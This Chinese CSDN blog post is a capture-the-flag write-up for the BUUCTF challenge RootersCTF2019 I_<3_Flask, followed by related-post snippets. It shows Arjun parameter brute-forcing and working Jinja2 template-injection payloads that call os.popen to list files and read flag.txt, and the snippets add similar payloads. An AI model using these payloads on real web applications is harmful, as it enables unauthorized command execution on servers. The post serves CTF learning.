[RootersCTF2019]I_<3_Flask

最新推荐文章于 2024-03-23 12:44:01 发布
最新推荐文章于 2024-03-23 12:44:01 发布
阅读量261 收藏
点赞数
分类专栏: BUUCTF 文章标签: flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/128125719
版权

题目告诉我们了,这题是Flask,很可能考的就是SSTI

我们要先找到参数

工具:GitHub - s0md3v/Arjun: HTTP parameter discovery suite.

pip3 install arjun
py -3 setup.py install
arjun -h #验证安装

 爆破参数

arjun -u http://186a2253-4b14-4088-8f7f-4879d8b30673.node4.buuoj.cn:81/ -c 100 -d 5

比较慢,需要等一会

参数是name,读取flag

?name={{%27%27.__class__.__base__.__subclasses__()[222].__init__.__globals__[%22os%22].popen(%27ls%27).read()}}

?name={{%27%27.__class__.__base__.__subclasses__()[222].__init__.__globals__["os"].popen(%27cat%20flag.txt%27).read()}}

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RootersCTF2019 I ♥ Flask
汗的博客
08-29 473
知识点 url参数爆破、ssti 信息收集 看了别人的wp,才知道http参数这方面的信息收集 这里使用arjun,当然也可以万能的burpsuite python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get 得到参数name 改成/?name={{3*3}} 利用和get flag 获取当前目录下文件列表 xxxxx.cn/?name={{config.__class__.__init__.__globals__['os'].popen('ls').
paddleOCR_flask_web服务化.rar
08-20
paddleOCR+flask实现web接口化服务,直接调用接口识别图像中的文字,支持脚本测试。
os模块
qq_45594312的博客
01-11 155
1.概述 os模块提供了多数操作系统的功能接口函数 当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作 在python编程时,经常和文件、目录打交道,所以离不了os模块 2.一些操作 1.返回操作系统类型 程序代码 运行结果 2.操作系统的详细信息 程序代码 运行结果 3.系统的环境边量 程序代码 运行结果 4.判断是否是绝对路径 程序代码 运行结...
[RootersCTF2019]I_3_Flask -不会编程的崽
最新发布
不会编程的崽的博客
03-23 509
参数爆破 简单的jinja&ssti
第三次课c3.zip_flask_flask网站_网站 python
09-23
使用pythonflask框架搭建类似Instagram网站
douban_flask_pythonflask豆瓣_python_
10-02
PYTHON 获得豆瓣电影榜单TOP250 爬虫升级版本
toutiao-backend_Flask框架_flask_
09-30
基于python语言,利用flask框架开发的类似新闻头条web
flask_restplus.rar
07-02
flask-sql-blueprint是博客‘再遇Flask restplus’的代码,同时其中还有四个todo代码,是restplus官方推出的四个经典实例,希望对大家有一点点帮助~
强大的端口扫描工具! 绝对无毒绿色!
07-13
强大的端口扫描工具! 绝对无毒绿色!快来下载,无毒!
基于变结构控制策略的转台控制技术研究
05-05
本文是硕士学位论文,题目是《基于变结构控制策略的转台控制研究》。
BUUCTF RootersCTF2019]I_3_Flask
CyhDl666的博客
03-17 296
文章目录手注tplmap 手注 刚进入题目 知道是SSTI注入 但是没找到注入点 学到了一个新的工具 Arjun 扫描到get参数name ?name={{'aaa'.upper()}} 确定是SSTI注入 构造payload: {% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__== 'Popen' %}{{c.__init__.__globals__['os'].popen('ls').read()}}{% en
BUUCTF [RootersCTF2019] I_3_Flask
Senimo
12-19 1212
BUUCTF [RootersCTF2019] I_<3_Flask 考点: Jinjia2模版注入 Arjun参数爆破工具 tplmap模版注入工具 启动环境: 一道Flask题目,大概率为模版注入,先用Arjun工具对可利用传参进行爆破: python3 arjun.py -u http://xxx.node3.buuoj.cn/ -m GET -c 200 得到参数名:name 尝试传入值:?name=1 页面发生了变化,传参被成功执行,尝试模版注入: ?name={{2*2}}
[RootersCTF2019]I_3_Flask 1&arjun爆破参数
plant1234的博客
10-04 1569
根据测试发现有ssti模板注入。
BUUCTF--[RootersCTF2019]I_3_Flask
qq_46263951的博客
07-15 278
进入页面后发现并没有什么可以利用的地方 利用Arjun扫描可以得到一个参数name 接下来要利用SSTI模板注入 尝试模板注入,发现可以成功执行 ?name={{8*8}} 方法一: 直接可以利用此漏洞执行payload ?name={{lipsum.__globals__.os.popen('cat flag.txt').read()}} 方法二: 使用tplmap,可以得到是存在jinjia2模版注入再进行getshell即可拿到flag 由于我这边...
BUUCTF-[RootersCTF2019]I_3_Flask
weixin_49803180的博客
07-17 218
直接利用flask的一个方法:lipsum,在lipsum.__globals__含有os模块,利用方法:{{lipsum.__globals__['os'].popen('ls').read()}}name={{''.__class__.__base__.__subclasses__()[132].__init__}} #查看模块是否被加载。name={{%27%27.__class__.__base__.__subclasses__()}}#查看当前页面下,加载的子类。加载成功就可以利用了。
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值